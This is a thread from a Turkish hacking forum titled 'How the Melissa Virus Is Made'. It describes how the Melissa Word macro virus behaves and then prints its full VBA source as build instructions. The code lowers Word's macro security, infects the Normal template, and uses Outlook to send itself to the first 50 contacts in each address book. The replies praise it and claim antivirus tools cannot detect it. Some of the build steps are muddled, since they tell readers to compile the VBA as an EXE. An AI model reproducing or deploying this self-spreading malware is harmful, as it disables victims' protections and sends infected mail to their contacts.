İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Melissa Virüs'ünün Yapılışı

15-08-2012 20:33
#1
Üyelik tarihi:
07/2012
Nereden:
[ Gökyüzü ]
Mesajlar:
943
Teşekkür (Etti):
50
Teşekkür (Aldı):
382
Konular:
99
-Word’e bulaşıp açtığınız tüm Word belgelerini etkiliyor.

-Daha rahat yayılabilmek için ayarları değiştiriyor.

-Microsoft Outlook’u kullanarak, kılık değiştirip kendini bir mesaj gibi gösteriyor ve kendi kendini e-postalıyor.

-Melissa’ nın bulaşmış olduğu bir Word belgesini açtığınızda, virüs Word’ ün temel şablonu olan NORMAL.DOT‘ a bulaşıyor. Word sizin bütün kişisel ayarlarınızı ve temel makrolarınızı bu şablon dosyada tutar. Dolayısıya, kendini NORMAL.DOT‘a kopyalayan Melissa, yarattığınız bütün yeni belgelere de kendiliğinden bulaşıyor.

Registry’ de değişiklik
Melissa’ nın Registry’ e düştüğü bir kayıt da var. HKEY_Current_User/Software /Microsoft/Office/Melissa anahtarında, “… by Kwyjibo” diye bir değer görürseniz, bilin ki sisteminize Melissa uğramış.

Melissa her şeyden önce sisteminizdeki MS Word’ün sürümünü kontrol ediyor. Word 97 ve Word 2000′de farklı tavır gösteriyor çünkü. Word 95 ve daha önceki sürümleri ise etkilemiyor.

Sisteminizde Word 97 varsa…
Word 97′de Melissa’nın bulaştığı bir belgeyi açtığınızda şunlar oluyor: Tools (Araçlar) menüsündeki Macro (Makro) komutu kullanılamaz hale geliyor. Dolayısıyla, herhangi bir belgedeki veya bir şablondaki makroları denetleme özelliğini kaybediyorsunuz.

Melissa, kimi Word 97 ayarlarını da değiştirerek yayılmayı kolaylaştırıyor. Özellikle Macro virus protection (Makro virüs koruması), “Prompt to save normal template” (Normal şablonunu kaydetmeden önce sor) ve “Confirm conversion at open” (Açılışta dönüşümleri onayla) seçeneklerini devreden çıkarıyor.

Sisteminizde Word 2000 varsa…
Microsoft’un son şeklini almasını beklediğimiz yeni kelime işlemcisindeyse, Melissa biraz daha farklı davranıyor:

Tols|Macro menüsündeki Security komutuna erişimi engelliyor. Böylece, bir yere kadar da olsa, makro virüslerini engelleyebilen bu özellikten yoksun kalıyorsunuz.
Aynı zamanda, Word’ ün makro virüs güvenlik düzeyini de minimuma düşürerek makrolara karşı korunma düzeyini sıfırlıyor.

Sisteminizde MS Outlook’ un tam sürümü (Outlook Express değil) kurulu ise Melissa, adres defterinden 50 adet e-posta adresini seçip bulaştığı bir Word belgesini de ekleyerek bu adreslere mesaj gönderiyor. Mesajı alanlar, sizin gönderdiğinizi sanıyorlar, çünkü Melissa, başlık satırında sizin adınızı kullanabiliyor.


Şimdi Hep Beraber Virüsün Nasıl Yapıldığını İnceleyelim

Bu Virüs Normalde Word'de Bazı Uygulamalara Maruz kalarak yapılır Ancak Melissa Virüsünün Önlemlerini Bütün İşletim Sistemleri Aldı Bu Yüzden Artık Word İşe Yaramıyor.

Bir Çok Virüs Sistemi Bu Virüsü Tanımlayamıyor.


Anlatım;

Visual Basic'imizi Açıyoruz Standart.EXE Diyerek Program Yapma Sayfasına Geçiyoruz. Ve Direct Olarak Kod Sayfamıza Grip Aşağıdaki Kodları Ekliyoruz Ve EXE Olarak Kaydetip Çıkıyoruz.


Private Sub ********_Open() ' Writted By HUNTER
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9 .0\W ord\Security", "Level") <> "" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9 .0\W ord\Security", "Level") = 1&
Else
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" , "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that ******** you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add Active********.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" , "Melissa?") = "... by Kwyjibo"
End If


Set ADI1 = Active********.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If

If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub ********_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub ********_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, Active********.Name, "********") = False) Then
Active********.SaveAs FileName:=Active********.FullName
ElseIf (InStr(1, Active********.Name, "********") <> False) Then
Active********.Saved = True
End If

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub





Teşekkürü Çok Görmeyin.
Kullanıcı İmzası
Pilot Olunmaz , Pilot Doğulur
Türk Hava Kuvvetleri
F-16 Fighting Falcon
Gökyüzü Bekçileri
Pilot
Konu xxxHUNTERxxx tarafından (15-08-2012 22:49 Saat 22:49 ) değiştirilmiştir.
tarkan44444 Teşekkür etti.

15-08-2012 20:35
#2
Üyelik tarihi:
07/2012
Nereden:
[ Gökyüzü ]
Mesajlar:
943
Teşekkür (Etti):
50
Teşekkür (Aldı):
382
Konular:
99
Önemle Belirtiyorum Bu Virüs'le Oyun olmuyor , PC'nize Elveda Diyebilirsiniz Bir Hata sonucunda Dikkatli Kullanalım. Dediğim Gibi Virüs Sistemleri Bunu Tam olarak algılayamıyor ve Buna Bilinmeyen Gözle Bakıyorlar.
Kullanıcı İmzası
Pilot Olunmaz , Pilot Doğulur
Türk Hava Kuvvetleri
F-16 Fighting Falcon
Gökyüzü Bekçileri
Pilot
15-08-2012 22:43
#3
Üyelik tarihi:
07/2012
Nereden:
Adana
Yaş:
28
Mesajlar:
479
Teşekkür (Etti):
22
Teşekkür (Aldı):
24
Konular:
55
saol kardeşim çok güzel olmuş ama bu tehlikeli bir virüs kimse açmaya cesaret edemez
birde verilmişti..
15-08-2012 23:52
#4
hacker by soner - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
07/2012
Mesajlar:
197
Teşekkür (Etti):
131
Teşekkür (Aldı):
16
Konular:
20
işe yarar

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı